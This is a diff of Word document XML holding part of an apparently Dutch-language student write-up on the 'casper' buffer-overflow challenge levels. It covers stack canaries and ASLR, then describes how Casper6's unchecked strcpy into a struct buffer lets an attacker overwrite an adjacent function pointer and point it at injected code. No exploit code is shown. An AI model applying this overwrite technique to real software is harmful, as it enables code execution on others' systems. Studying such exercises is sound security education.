-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>canary</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ook overschreven worden. Bij elke functie return gaat gekeken worden of de </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>canary</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> aangepast werd, als dit het geval is stop het programma onmiddellijk.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Een vierde mitigatie is d</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">oor gebruik te maken van ASLR, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Address</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Space </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Layout</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Randomization</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Dit maakt het moeilijker om het correcte adres te specifiëren van de shell code.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop2"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc25519925"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Advanced level: Casper41</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="7"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Dit geavanceerde level heeft d</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>ezelfde structuur als casper4. Het enige verschil is dat de het gebruik maakt van de “</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>clearEnvironment</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>” functie om de environment variabelen te verwijderen.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Dezelfde exploit als deze van casper4 kan gebruikt worden omdat deze oplossing niet gebruik maakt van environment variabelen.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Het bevat nog steeds dezelfde </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>vulnerabilities</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
@@ -3247,7 +3352,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc25519926"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc25519926"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Casper</w:t>
@@ -3258,55 +3363,410 @@
         </w:rPr>
         <w:t>6</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="7"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="8" w:name="_Toc25519927"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Omschrijving</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="8"/>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Het programma in c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>asper6 is gelijkaardig aan casper4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Het verschil is het gebruik van de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>struct</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">De </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>struct</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> slaagt een buffer van 999 karakters</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> op</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> gevolgd met een functie pointer die als input parameter een pointer naar karakters aanvaard.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Deze </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>struct</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> wordt opgeslagen in het datasegment van de memory.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> De “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>greetUser</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>” functie gaat in dit programma enkel “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Hello</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">” printen gevolgd door de karakters dewelke voorzien worden als argument </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>van</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> de functie.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Bij de start va</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">n het programma gaat de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>somedata.fp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> functie pointer </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>gïnitialiseerd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> worden met het adres van de “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>greetUser</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">” functie. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Vervolgens wordt er nagekeken of er een parameter meegegeven wordt, net zoals in casper4.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Hierna wordt de input gekopieerd naar de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>somedata.buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> variabele. Dewelke, tot slot, gebruikt wordt bij het aanroepen van de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>som</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>data.fp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> func</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>tie.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Wat opvalt zijn de variabelen in de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>struct</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> en het onveilig </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>kopiëren</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> met behulp van de “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>strcpy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>” functie.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Kop3"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc25519927"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Omschrijving</w:t>
+      <w:bookmarkStart w:id="9" w:name="_Toc25519928"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Vulnerability</w:t>
       </w:r>
       <w:bookmarkEnd w:id="9"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Het programma in c</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>asper6 is gelijkaardig aan casper4</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Het verschil is het gebruik van de </w:t>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Dit programma bevat een </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>heap-based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> buffer overflow </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>vulnerability</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Het is mogelijk om de functie pointer van de </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3320,125 +3780,7 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">De </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>struct</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> slaagt een buffer van 999 karakters</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> op</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> gevolgd met een functie pointer die als input parameter een pointer naar karakters aanvaard.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Deze </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>struct</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> wordt opgeslagen in het datasegment van de memory.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> De “</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>greetUser</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>” functie gaat in dit programma enkel “</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Hello</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">” printen gevolgd door de karakters dewelke voorzien worden als argument </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>van</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> de functie.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Bij de start va</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">n het programma gaat de </w:t>
+        <w:t xml:space="preserve"> (</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3452,147 +3794,55 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t xml:space="preserve"> functie pointer </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>gïnitialiseerd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> worden met het adres van de “</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>greetUser</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">” functie. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Vervolgens wordt er nagekeken of er een parameter meegegeven wordt, net zoals in casper4.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Hierna wordt de input gekopieerd naar de </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>somedata.buf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> variabele. Dewelke, tot slot, gebruikt wordt bij het aanroepen van de </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>som</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>e</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>data.fp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> func</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>tie.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Wat opvalt zijn de variabelen in de </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>struct</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> en het onveilig </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>kopiëren</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> met behulp van de “</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>strcpy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>” functie.</w:t>
+        <w:t xml:space="preserve">) te overschrijven. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Dit is mogelijk omdat de pointer boven de buffer variabele is opgeslagen en er niet gekeken wordt hoeveel </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>karakters</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> er gekopieerd worden in de buffer. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Dit laat de aanvaller toe om genoeg data als input te geven om de functie pointer te overschrijven en </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">deze </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">te </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">laten </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>wijzen naar eigen geschreven code.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3611,159 +3861,14 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc25519928"/>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Vulnerability</w:t>
+      <w:bookmarkStart w:id="10" w:name="_Toc25519929"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Exploit beschrijving</w:t>
       </w:r>
       <w:bookmarkEnd w:id="10"/>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Dit programma bevat een </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>heap-based</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> buffer overflow </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>vulnerability</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. Het is mogelijk om de functie pointer van de </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>struct</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
